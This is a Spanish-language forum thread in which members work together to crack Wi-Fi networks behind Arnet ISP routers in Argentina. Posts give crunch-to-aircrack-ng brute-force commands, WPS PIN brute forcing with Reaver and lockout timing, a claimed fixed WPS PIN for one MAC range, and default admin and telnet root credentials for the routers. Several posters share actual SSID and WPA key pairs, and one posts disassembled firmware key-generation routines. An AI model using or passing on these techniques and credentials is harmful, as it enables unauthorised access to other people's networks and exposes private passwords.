      </script>
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Fertxt en 26 de Noviembre de 2013, 02:30:34 am
Te aporto los datos de mi router...
Me hice miembro de la pag solo para seguir este tema asi que espero que no decaiga...

WiFi-Arnet-b693

WPA-PSK:  B369603BF1

MAC:  FC:F5:28:06:51:AB

Espero que les sirva
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 07 de Diciembre de 2013, 01:48:33 pm
Novedades!!!

Actualmente ARNET esta entregando unos nuevos routers (todavia no tengo mucha info sobre los mismos), que poseen los siguientes datos:

ESSID: WiFi-Armet-NNNN (N = Números / No tienen nada que ve con la MAC)
BSSID: 9C:D2:4B:XX:XX:XX
Espacio de BSSID: 9C:D2:4B:00:00:00 - 9C:D2:4B:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WPA2 CCMP PSK
WPS: Activo! 1341XXXX

Actualmente estoy trabajando con una de ellas para saber un poco más sobre el router, el ataque es lento pero por ahora ya tengo los primeros dígitos del WPS, su sistema de bloqueo en realidad no es como otros que se bloquea y no permite el ingreso, este en particular llega a un X cantidad de pruebas fallidas por lo que he visto 3 pruebas y se bloquea por 60seg. luego vuelve a funcionar hasta que desaparece la red en "Linux", en "Windows" se ve perfectamente.

Cuando tenga más información se las estaré pasando.



Con un delay de 15seg. se pueden probar 3 Pins, luego se bloquea por 60seg.
Con un deley de 30seg. se pueden probar más de 10 y no se bloquea. Pero al pasar un tiempo se reciben algunos errores de:

Código: [Seleccionar]
[!] WPS transaction failed (code: 0x03), re-trying las pin



08-12-2013 18:33:

Ataque:
Tiempo: Aproximadamente 75 horas.
Total Completado: 97.49%
Pruebas: 62 seconds/pin.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 08 de Diciembre de 2013, 10:15:12 pm
Bueno novedades!!! al fin termino! el router es un ZTE ZXHN H168N:

(http://wwwen.zte.com.cn/en/products/access/cpe/201111/W020111110359570247684.jpg)

ESSID: WiFi-Armet-NNNN (N = Números / No tienen nada que ve con la MAC)
BSSID: 9C:D2:4B:XX:XX:XX
Espacio de BSSID: 9C:D2:4B:00:00:00 - 9C:D2:4B:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WPA2 CCMP PSK
WPA2: ne89124578 (Por Defecto al seleccionar en la config. tanto para WPA/WPA2)
WPS: Activo! 13419622
IP: 192.168.1.1
Software Versión: ZXHN H168N V1.1.00_TA_11
Hardware Versión: 963168VX-Broadcom
Boot Loader Version: 1.0.38-112.37
Serial Number: 9cd24b790afb
Panel de Administración Avanzado: http://192.168.1.1/admin.html (http://192.168.1.1/admin.html)
Usuario de Ingreso Avanzado: admin
Password de Ingreso Avanzado: CalVxePV1!
Multi-SSID: 4 (Máximo)
Desactivar el WPS: Se puede desactivar desde el Panel de Administración Avanzado (Network > WLAN > WPS)
DDNS: dipc, dyndns y DtDNS
Manual de Configuración Básica de Arnet: Aquí (http://arnetonline.arnet.com.ar/CMEDocuments/ATA/pdf/Manualdeusuario_ZTEH168N.pdf)
Pagina Web del Fabricante: Aquí (http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130205_386413.html).

WPA/WPA2 Radius (Por Defecto al seleccionar en la config.):
Radius Port: 1812
Radius Key: 12345678
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: nicovillafa en 25 de Diciembre de 2013, 09:04:13 pm
Uno de los muchachos participantes de este foro publico esto y en colores les hago ver las similitudes con los datos que aportare mas abajo y ademas como el SSID esta presente en la clave WPA

WiFi-Arnet-b693
WPA-PSK: B369603BF1

Datos aportados por mi con ciertas similitudes

WiFi-Arnet-5b83
WPA-PSK: 5FB8B932E5
 
Otro dato

WiFi-Arnet-4245
WPA-PSK: 717fdikm2o

D3M0N que no decaiga!!!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: powershell en 03 de Enero de 2014, 12:44:53 pm
Tengo un Router ZTE del inquilino anterior. se puede acceder por telnet. se podra encontrar si tiene el algoritmo que genera la clave?
Hay que poner todos estos comandos, usuarios y passwords
# telnet 192.168.1.1
username: root
password: public

>enable
password: zte

#shell
Login: root
Password: root
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 09 de Febrero de 2014, 05:21:57 pm
Bueno últimamente me estoy encontrando con varias redes nuevas pero son WEP  :P  con routers ZTE ZXHN H108N, anteriormente había crackeado un ZTE ZXHN H168N (http://www.arg-wireless.com.ar/index.php?topic=1006.msg5652#msg5652) con WPA atacado por WPS.

ESSID: WiFi-Arnet-??XX (?? = Minusculas - XX = Mayusculas)
BSSID: B4:B3:62:XX:XX:XX
Espacio de BSSID: B4:B3:62:00:00:00 - B4:B3:62:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WEP
WEP: 25199
IP: 192.168.1.1
Software Versión: ZTE ZXHN H108N V3.0.00_TAT26
Hardware Versión: 96328avng
Boot Loader Version: 1.0.37-106.24
Serial Number: b4b3626d877b
Panel de Administración Avanzado: http://192.168.1.1/admin.html (http://192.168.1.1/admin.html)
Usuario de Ingreso Avanzado: admin
Password de Ingreso Avanzado: CalVxePV1!

Pagina de Inicio (No admin):
(http://i.minus.com/iJ25XBdj50cr3.png)

Pagina de Inicio Administrador:
(http://i.minus.com/iim5YwUGZJ4VC.png)

Lamentablemente vía web no se puede configurar nada, ambas paginas sea la normal o la de admin no traen menús ni nada, solo info del hard.

No tiene SSH activo.

Tiene Telnet:

Código: [Seleccionar]
# telnet 192.168.1.1 
username: root
password: public

>enable
password: zte

#shell
Login: root
Password: root

Investigando por Telnet, si estaría en WPA-PSK, el pass seria "1851852963", ninguna información sobre WPS, en esta versión de Firmware.

Algunos comandos:
Código: [Seleccionar]
Una vez dentro del busybox podemos manipular cosillas directamente en la DB de la configuración con sendcmd 

# sendcmd 1 DB all
nos muestra todas las tablas de configuracion

# sendcmd 1 DB p WLANBase
muestra por ejemplo los datos de la configuración de la Interface inalámbrica

# sendcmd 1 DB set WLANBase 0 Channel 11
cambia el valor del canal (valor channel del row 0 de la tabla WLANBase)

# sendcmd 1 DB save
guarda la configuración.

# reboot
Título: Hackear wifi Arnet
Publicado por: Emma882 en 13 de Marzo de 2014, 04:21:07 pm
Hola Bueno nose si estoy en la zona para preguntar esto...
soy nuevo usuario y de mi parte felicidades por el foro esta espectacular da muchas ganas de aprender..
Mi pregunta es la siguiente... Como puedo sacar la clave de un ruter "Arnet" con incriptacion (Wpa-ccmp) ya hace un tiempo vengo leyendo y poniendo a prueba varios tutoriales pero sin resultado alguno... si alguien me puede ofrecer un tutorial o herramientas la cual puedo usar para hacer esto seria genial... ya que me canse de buscar y hacer pruebas sin llegar a algo por ende me tomo esta medida como ya solucion a tanta buskeda... Espero respuestas pronto muchas gracias  ;)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 13 de Marzo de 2014, 09:02:28 pm
Hola @Emma882, combino tu tema para que lo veas. En este post esta todo.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 20 de Marzo de 2014, 11:28:56 pm
Buenas gente, tengo una nueva red para comentarles, la MAC Address comienza con "E8:43:C1" de la cual se desconoce el fabricante (He probado varios sitios como "http://www.macvendorlookup.com/" y no encontré nada), cuestión muy rara pero bueno ya a futuro sabremos. El SSID de la red es "WiFi-Arnet-NLLL" (N = Numero - L = Letra Minúscula)

Otra más la MAC Address comienza con "64:2D:AB" de la cual se desconoce el fabricante (He probado varios sitios como "http://www.macvendorlookup.com/" y no encontré nada), cuestión muy rara pero bueno ya a futuro sabremos. El SSID de la red es "WiFi-Arnet-LLNL" (N = Numero - L = Letra Minúscula).

Próximamente más info sobre este router.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 24 de Marzo de 2014, 07:49:30 pm
Información sobre las redes nuevas: actualmente no tienen WPS Activo y no se tiene registro de algún patrón en particular.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 03 de Abril de 2014, 07:20:49 am
Tengo nuevas novedades sobre los nuevos routers que esta entregando Arnet, en este caso la MAC Address comienza con "E8:43:F6" el fabricante es ZyXEL, el router es similar a este:

(http://www.lambda-tek.com/VMG1312-B10A-GB01V1F-ZyXEL-VMG1312-VDSL2-profile-17a-over-POTS-modem-with-4FE-LAN-ports-1-USB-Port-WiFi-802-11n-2x2-CH1-13-IPv6-EU-STD-version~csES/images/img2664978.jpg)

Los datos:

El SSID de la red es "WiFi-Arnet-LNLN" (N = Numero - L = Letra Minúscula)
La Clave WPA aparenta ser Hex. todo en Mayusculas: LNNLLNNNLL (N = Numero - L = Letra Minúscula)

No se cumple lo marcado por @nicovillafa.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: MundoWISP en 03 de Abril de 2014, 02:31:04 pm
Parcialmente se podría hacer fuerza bruta con crunch directo al aircrack, ya que si generan el diccionario tendría 11TB

Código: [Seleccionar]
crunch 10 10 ABCDEF0123456789 hex -o START -t @@@@@@@@@@ | aircrack-ng file-*.cap -e (SSID) -w -

y a su tiempo tendría que salir sin problemas
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 05 de Abril de 2014, 12:43:25 pm
Es impresionante como la gente tiene internet y no se conecta al router.. ajaja, más de 40 horas y no se conecto ningún cliente..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 05 de Abril de 2014, 04:33:17 pm
Novedades.. Novedades.. tengo el apreton de manos de una de las redes y ya esta crackeando con crunch:

Código: [Seleccionar]
crunch 10 10 ABCDEF0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -e (SSID) -w- handshakefile.cap
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hydra en 10 de Mayo de 2014, 02:23:47 am
Justamente en casa se contrato el servicio de Arnet, que para colmo, si a uno se le da la gana, puede cambiar la clave de 10 dígitos alfanumerica que tiene y poner una a gusto, aunque quien sabe quien se tomara la molestía.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 10 de Mayo de 2014, 01:27:16 pm
También @hydra pensé lo mismo, pero no toda la gente sabe sobre el asunto.. y bueno, en fin después de 500 horas termine cancelando, son muchas keys...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 14 de Mayo de 2014, 08:44:56 pm
Hola soy nuevo,

alguién me podría proporcionar un firmware de estos routers o a malas un acceso remoto para extraer algunos ficheros necesarios para rebuscar un poco.  ;D  Creo que se donde esconden el algoritmo. Sólo necesito más datos.

Se aprecia cualquier aporte, importante firmware completo para poder reversearlo.

Happy reversing!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Mayo de 2014, 10:54:23 pm
Por el momento creo que no hay...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 15 de Mayo de 2014, 07:31:30 am
Por el momento creo que no hay...

¿Y alguien que posea el router fisicamente?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 30 de Mayo de 2014, 06:39:40 am
Vale creo haber encontrado algo solo para router ADB Broadband Pirelli. Claves WPA alfanuméricas de 10 dígitos.

Necesito datos para corroborarlo, es decir mac-wpa.

Cheers
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 02 de Junio de 2014, 10:06:10 pm
hola les doy los datos de 2 redes de conocidos mios:

ESSID: WiFi-Arnet-LLNL (L=letras N=numeros)
BSSID: 28-28-5D-XX-XX-XX
WPA: igK4eXgimk (la k y la x en mayuscula)
router marca ZyXEL Communications Corporation modelo P-660hnu-t1

ESSID: WiFi-Arnet-NNNN (N=numeros)
BSSID: 74-88-8B-XX-XX-XX
WPA: xte3enpub2
router marca ADB Broadband Argentina S.A. modelo P. DG A4001N

saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 02 de Junio de 2014, 10:08:52 pm
me olvide de decirles el zyxel fue contratado hace 6 meses y el adb poco mas de 1 año.

ojala puedan sacar el patron de estas redes.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 16 de Junio de 2014, 05:08:46 pm
hola soy de misiones ak  esta llena de estas redes wpa de arnet espero que se pueda encontrar un patron yo aporto una algunos datos que recopile la mayoria son moden de la marca ADB modelo PDG A4001N las contrasela son alfanumericas de 10 digitos y tengo un par de contraseñas de amigos que son estas
Nombre de la red WIFI-ARNET-0502  CLAVE :9bfhr4qad9
nombre de la red WIFI-ARNET-4980 CLAVE : bb66bwrq47
espero que sirva de algo este dato, por ahi si se consigue mas contraseñas se podria ver si se encuantra un patron para delimitar la busqueda
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: danonino2003 en 17 de Junio de 2014, 09:41:49 am
gente me suscribi porque queria dejar mi aporte

(http://imgur.com/dyLcona)

esta como veran termina en 4 letras
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: danonino2003 en 17 de Junio de 2014, 09:45:53 am
http://imgur.com/dyLcona
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 22 de Junio de 2014, 06:35:03 pm
la verdad q cosa mas rara las wifi-arnet esos password parece aleatorios vaya a saber si guardan logica... ojala alguien pueda sacarlas. saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 27 de Junio de 2014, 04:46:24 pm
Alguien que tenga acceso fisico a un router y pueda trastear con el, que se ponga en contacto conmigo


@diogenes : Gratamente agradecido....
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: diogenes en 28 de Junio de 2014, 09:43:27 pm
Alguien que tenga acceso fisico a un router y pueda trastear con el, que se ponga en contacto conmigo


@diogenes : Gratamente agradecido....

recien te respondo el mensaje decime en q te puedo ayudar mientras no vaya a romper el router y quedar sin internet! saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 07 de Julio de 2014, 12:57:29 am
Necesito  la key para routers ADB  con mac A4:52:6F
Para ver si hay algun patron!
Gracias!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 07 de Julio de 2014, 09:32:46 pm
hola yo estube viendo algunos router ABD y no tienen ningun patron entre las mac y las key de dichos routers aabria q buscar otra manera de encontrar algun patron
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 09 de Julio de 2014, 02:07:09 am
hola yo estube viendo algunos router ABD y no tienen ningun patron entre las mac y las key de dichos routers aabria q buscar otra manera de encontrar algun patron

OK , pero sabes cuantos letras son ?  solo letras y numeros ?  mayusculas y minusculas ?
estaria bueno pongas algunos ejemplos si contas con esta data!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 09 de Julio de 2014, 04:39:19 pm
hola ya habia dicho la data q tnia pero sebe q nadie miro vuelvo a repetir :
algunos datos que recopile la mayoria son moden de la marca ADB modelo PDG A4001N las contraseña son alfanumericas de 10 digitos
Nombre de la red WIFI-ARNET-0502  CLAVE :9bfhr4qad9
nombre de la red WIFI-ARNET-4980 CLAVE : bb66bwrq47

estas contraseñas entan en minusculas, vi un par mas pero no veo ningun patron se ve que generan de forma aleatorias las contraseñas  habria q ver si alguin tiene algun contacto en arnet si ellos tienen una base d datos o como es la distribucion de los modem a nivel pais capas q se podria ver con el nombbre d la red y si algun aporta otras contraseñas si se puede sacar algun patron, ah no traen activado la seguridad wps  :-X   
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 09 de Julio de 2014, 09:31:09 pm
@mat_1210 como se puede generar un diccionario para esas caracteristicas y cuanto tiempo estipulas lleve  a 400 k/s  dicho diccionario ?
Soy novato por eso pregunto , gracias
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: matt_1210 en 09 de Julio de 2014, 11:34:09 pm
hola viejo mira lo que estuve leyendo en lo otros aportes de los chicos dicen que llevaria 130 dias en corren yo lo probe con el backtrack con 200kb/s deje las maqina 3 dias y no paso de la letra A proba si qeres con este comando
./crunch 10 10 ABCDEFJHIJKLÑOPQRSTUVWXYZ0123456789 | aircrack-ng -w - nombre de tu archivo.cap -e WIFI-Arnet-xxxx

si tnes backtrack tnes q ir a lon menu y buscas crunch antes tnes q tnes el handshake en la -w va tu archivo .cap q seria cuando capturas elapreton d manos y la -e va el nombre d la red.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 10 de Julio de 2014, 10:27:26 pm
buenas! Sin ningún praton un alfanumerico de 10 digitos tardaria años en ser crackeado por fuerza bruta y mas a esa velocidad de calculo, ni siquiera con GPU utilizando la AMD R9 290x que tiene una velocidad de 14000000 k/s
Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 10 de Julio de 2014, 10:34:08 pm
Se me escapo un cero 1.400.000 k/s! :)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jobuu en 11 de Julio de 2014, 12:24:09 pm
Se me escapo un cero 1.400.000 k/s! :)

Fuaaaaaaaaa tanto???????????????????

Yo tengo una ati 4870 HD  y me hace 400 ks :S
Tan mala es mi placa :S
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 11 de Julio de 2014, 09:26:11 pm
tenes que usar el oclhashcat o algun otro programa que utilice la GPU, con el crunch estas usando el procesador y es mas lento..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: c3nt1n3l27 en 11 de Julio de 2014, 10:05:27 pm
Aunque la tuya a ser "vieja" como es la serie 4XXX ya no tiene soporte a los ultimos driver, en este caso la versión 14.4 de catalyst que es la que necesitas para correr la ultima version del OclHashcat..
La unica y rebuscada solucion que tenes a eso es utilizar un version anterior del Oclhashcat la cual permita correr la ultima version de driver para tu placa que creo que es la 13.9 y cambiar en la BIOS el año a 2013(Esto por que este programa verifica mediante este metodo que tengas actualizado su programa).-

http://golubev.com/gpuest.htm

En ese link tenes el estimado de varias placas de video.-
Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 16 de Julio de 2014, 02:50:09 pm
Bueno, sigo con esperanzas de encontrar un patrón aquí así que ordené un poco la infomación que tenemos  ;)

(http://k40.kn3.net/6/A/7/E/E/6/C3C.jpg)

Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 16 de Julio de 2014, 10:31:35 pm
Bueno novedades!!! al fin termino! el router es un ZTE ZXHN H168N:

ESSID: WiFi-Armet-NNNN (N = Números / No tienen nada que ve con la MAC)
BSSID: 9C:D2:4B:XX:XX:XX
Espacio de BSSID: 9C:D2:4B:00:00:00 - 9C:D2:4B:FF:FF:FF
Marca: ZTE Corporations
Cifrado: WPA2 CCMP PSK
WPA2: ne89124578 (Por Defecto al seleccionar en la config. tanto para WPA/WPA2)
WPS: Activo! 13419622
IP: 192.168.1.1
Software Versión: ZXHN H168N V1.1.00_TA_11
Hardware Versión: 963168VX-Broadcom
Boot Loader Version: 1.0.38-112.37
Serial Number: 9cd24b790afb
Panel de Administración Avanzado: http://192.168.1.1/admin.html (http://192.168.1.1/admin.html)
Usuario de Ingreso Avanzado: admin
Password de Ingreso Avanzado: CalVxePV1!
Multi-SSID: 4 (Máximo)
Desactivar el WPS: Se puede desactivar desde el Panel de Administración Avanzado (Network > WLAN > WPS)
DDNS: dipc, dyndns y DtDNS
Manual de Configuración Básica de Arnet: Aquí (http://arnetonline.arnet.com.ar/CMEDocuments/ATA/pdf/Manualdeusuario_ZTEH168N.pdf)
Pagina Web del Fabricante: Aquí (http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130205_386413.html).

WPA/WPA2 Radius (Por Defecto al seleccionar en la config.):
Radius Port: 1812
Radius Key: 12345678

Hola buenas noches, tengo un handshake del mismo router, WiFi-Arnet-NNNN (MAC 9C-D2-4B), tiene wps activo!, cual es el procedimiento de fuerza bruta wps?

Pd: hay algun diccionario (LLNNNNNNNN) o cual seria el comando en crunch?
Desde ya muchas gracias, excelente foro
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Julio de 2014, 11:34:56 pm
@daniel0600: usa el buscador del foro.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 17 de Julio de 2014, 10:38:52 am
@daniel0600: usa el buscador del foro.
Te agradezco tu pronta respuesta, pero no eh podido encontrar la solución a mi problema,
adjunto el handshake si alguno me ayuda a pasarle algun diccionario, seria muy agradecido...


HANDSHAKE (https://mega.co.nz/#!QlhjDAwA!ZnvmnmRo4kA_Zsx6yxJEQk2CdfqWQsLJY-AVU3sG-ko)
 
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: GSN en 17 de Julio de 2014, 11:12:55 am
Te agradezco tu pronta respuesta, pero no eh podido encontrar la solución a mi problema,
adjunto el handshake si alguno me ayuda a pasarle algun diccionario, seria muy agradecido...


HANDSHAKE (https://mega.co.nz/#!QlhjDAwA!ZnvmnmRo4kA_Zsx6yxJEQk2CdfqWQsLJY-AVU3sG-ko)
 

No uses el Hand, usa el WPS. Busca Reaver-WPS, o WPS y te sale toda la información.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: daniel0600 en 17 de Julio de 2014, 02:09:02 pm
No uses el Hand, usa el WPS. Busca Reaver-WPS, o WPS y te sale toda la información.
Les agradezco muchisimo, lo Saque con WPS pin (tardo 15 hs), 1341NNNN, la clave wpa 15757535NN
Muy contento, gracias por la colaboración...
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: danonino2003 en 21 de Julio de 2014, 07:49:12 pm
Hola, disculpa la ignorancia, como hiciste para forzarlo por wps, te pregunto porque cuando busco wps pin me sale un programa para android y dcon muy malos comentarios.

Yo soy partidarios de que el algoritmo esta plenamente relacionado con la mac y de que dependiendo de como empieze la mac es el algoritmo, pero si por wps es mas facil te pido por favor me expliques.

Saludos
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: cobrazzi en 26 de Julio de 2014, 08:57:52 pm
Analizando con mas profundidad podemos determinar que todas las claves WPA son de 10 digitos, mayormente numéricos de 7 a 9 caracteres.



Usuario y Contraseña Nuevos Modems/Routers Arnet (ADB A4001N y ZTE H108N )
Interfaz Arnet: http://192.168.1.1/
Interfaz Real: http://192.168.1.1/admin.html
Usuario: admin
Contraseña: CalVxePV1!

Me tope con algunos routers que si bien la clave por defecto era esa que mencionas otras era solo

admin
arnet

y las claves del wifi

wifi12345 o

arnet12345

no se a que se debe eso pero ya me tope con varios.

les aconsejaria antes de pasar un diccionario prueben esas claves por defecto.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 01 de Agosto de 2014, 02:23:19 pm
Buenas! He descubierto algo interesantísimo!
Las redes de Arnet que tienen el BSSID: 9C:D2:4B:XX:XX:XX
SIEMPRE usan el WPS Pin: 13419622

Saqué 3 con este método.
Saludos!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 02 de Agosto de 2014, 04:26:56 am
@sebabasa: interesante! gracias por el aporte  8)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 02 de Agosto de 2014, 08:28:49 pm
Buen dato, pero la mayoria no viene con WPS activado por defecto en el caso de Arnet :-X Lamentablemente
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 04 de Agosto de 2014, 10:23:36 pm
Al final me pasaron un firmware dumpeado de un Pirelli Arnet. Como otros pirellis el algoritmo encontrado es un SHA256 con la mac, una semilla secreta y quizas el serial.

Al no vivir en Argentina se me complica el asunto de poder seguir con el estudio. Parecen viables para crear una clave directa.


Mandarme privados con datos. Gracias

Os dejo algo que encontré en el firmare

Código: [Seleccionar]
.globl generateKey
generateKey:

var_20= -0x20
var_18= -0x18
var_10= -0x10
var_8= -8
var_4= -4
arg_0=  0
arg_4=  4
arg_8=  8
arg_C=  0xC

la      $gp, aSl_getdslwande  # "sl_getDslWanDevIidStack"
addu    $gp, $t9
addiu   $sp, -0x30
sw      $ra, 0x30+var_4($sp)
sw      $fp, 0x30+var_8($sp)
move    $fp, $sp
sw      $gp, 0x30+var_18($sp)
sw      $a0, 0x30+arg_0($fp)
sw      $a1, 0x30+arg_4($fp)
sw      $a2, 0x30+arg_8($fp)
sw      $a3, 0x30+arg_C($fp)
lw      $a0, 0x30+arg_8($fp)
la      $v0, 0xA0000
addiu   $a1, $v0, (aWl0 - 0xA0000)  # "wl0"
addiu   $v0, $fp, 0x30+var_10
move    $a2, $v0
la      $v0, wlmngr_getPBSHwAddr
move    $t9, $v0
jalr    $t9 ; wlmngr_getPBSHwAddr
nop
lw      $gp, 0x30+var_18($fp)
addiu   $v0, $fp, 0x30+var_10
sw      $v0, 0x30+var_20($sp)
lw      $a0, 0x30+arg_0($fp)
lw      $a1, 0x30+arg_4($fp)
lw      $a2, 0x30+arg_8($fp)
lw      $a3, 0x30+arg_C($fp)
la      $v0, generateKey_from_mac
move    $t9, $v0
jalr    $t9 ; generateKey_from_mac
nop
lw      $gp, 0x30+var_18($fp)
move    $sp, $fp
lw      $ra, 0x30+var_4($sp)
lw      $fp, 0x30+var_8($sp)
addiu   $sp, 0x30
jr      $ra
nop
 # End of function generateKey




Código: [Seleccionar]
.globl generateKey_from_mac
generateKey_from_mac:

var_18= -0x18
var_10= -0x10
var_8= -8
var_4= -4
arg_0=  0
arg_4=  4
arg_8=  8
arg_C=  0xC
arg_10=  0x10

la      $gp, (aSDDD+4)
addu    $gp, $t9
addiu   $sp, -0x28
sw      $ra, 0x28+var_4($sp)
sw      $fp, 0x28+var_8($sp)
move    $fp, $sp
sw      $gp, 0x28+var_18($sp)
sw      $a0, 0x28+arg_0($fp)
sw      $a1, 0x28+arg_4($fp)
sw      $a2, 0x28+arg_8($fp)
sw      $a3, 0x28+arg_C($fp)
li      $a0, 0x70  # 'p'
la      $v0, malloc
move    $t9, $v0
jalr    $t9 ; malloc
nop
lw      $gp, 0x28+var_18($fp)
sw      $v0, 0x28+var_10($fp)
lw      $a0, 0x28+var_10($fp)
la      $v0, SHA256_Init
move    $t9, $v0
jalr    $t9 ; SHA256_Init
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
la      $v0, 0xD0000
addiu   $a1, $v0, 0x29E0
li      $a2, 0x20  # ' '
la      $v0, SHA256_Update
move    $t9, $v0
jalr    $t9 ; SHA256_Update
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+arg_C($fp)
la      $v0, strlen
move    $t9, $v0
jalr    $t9 ; strlen
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
lw      $a1, 0x28+arg_C($fp)
move    $a2, $v0
la      $v0, SHA256_Update
move    $t9, $v0
jalr    $t9 ; SHA256_Update
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
lw      $a1, 0x28+arg_10($fp)
li      $a2, 6
la      $v0, SHA256_Update
move    $t9, $v0
jalr    $t9 ; SHA256_Update
nop
lw      $gp, 0x28+var_18($fp)
la      $a0, hash
lw      $a1, 0x28+var_10($fp)
la      $v0, SHA256_Final
move    $t9, $v0
jalr    $t9 ; SHA256_Final
nop
lw      $gp, 0x28+var_18($fp)
lw      $a0, 0x28+var_10($fp)
la      $v0, free
move    $t9, $v0
jalr    $t9 ; free
nop
lw      $gp, 0x28+var_18($fp)
lw      $v0, 0x28+arg_4($fp)
lw      $v0, 0($v0)
slti    $v0, 0x21  # '!'
bnez    $v0, loc_1D108
nop
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: 2kW79@32WEYS en 04 de Agosto de 2014, 10:42:41 pm
Sinos fijamos un poco más, vemos como se generan los ESSIDs
En serio, acepto routers por correo tambien  ;D

Citar
globl createSSIDFromMAC_str
createSSIDFromMAC_str:

addiu   $v0, (aWifiArnet04d - 0xA0000)  # "WiFi-Arnet-%04d"

addiu   $v0, (aIfconfigSVarHw - 0xA0000)  # "ifconfig %s > /var/hwaddr "






Código: [Seleccionar]
.globl createSSIDFromMAC_str
createSSIDFromMAC_str:

var_18= -0x18
var_10= -0x10
var_8= -8
var_4= -4
arg_0=  0
arg_4=  4

la      $gp, (aRutwan_start_2+0x14)
addu    $gp, $t9
addiu   $sp, -0x28
sw      $ra, 0x28+var_4($sp)
sw      $fp, 0x28+var_8($sp)
move    $fp, $sp
sw      $gp, 0x28+var_18($sp)
sw      $a0, 0x28+arg_0($fp)
sw      $a1, 0x28+arg_4($fp)
sw      $zero, 0x28+var_10($fp)
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 2
lbu     $v0, 0($v0)
sll     $v1, $v0, 24
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 3
lbu     $v0, 0($v0)
sll     $v0, 16
or      $v1, $v0
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 4
lbu     $v0, 0($v0)
sll     $v0, 8
or      $v1, $v0
lw      $v0, 0x28+arg_0($fp)
addiu   $v0, 5
lbu     $v0, 0($v0)
or      $v0, $v1, $v0
addiu   $v0, 3
li      $v1, 0xD1B71759
multu   $v0, $v1
mfhi    $v1
srl     $a0, $v1, 13
li      $v1, 0x2710
mul     $v1, $a0, $v1
subu    $v0, $v1
sw      $v0, 0x28+var_10($fp)
la      $v0, 0xA0000
addiu   $v0, (aWifiArnet04d - 0xA0000)  # "WiFi-Arnet-%04d"
lw      $a0, 0x28+arg_4($fp)



Citar
w      $gp, 0xC8+var_B0($fp)
lw      $a0, 0xC8+arg_0($fp)
la      $a1, ssid
la      $v0, createSSIDFromMAC
move    $t9, $v0
jalr    $t9 ; createSSIDFromMAC
nop
lw      $gp, 0xC8+var_B0($fp)
li      $v0, 0x20  # ' '
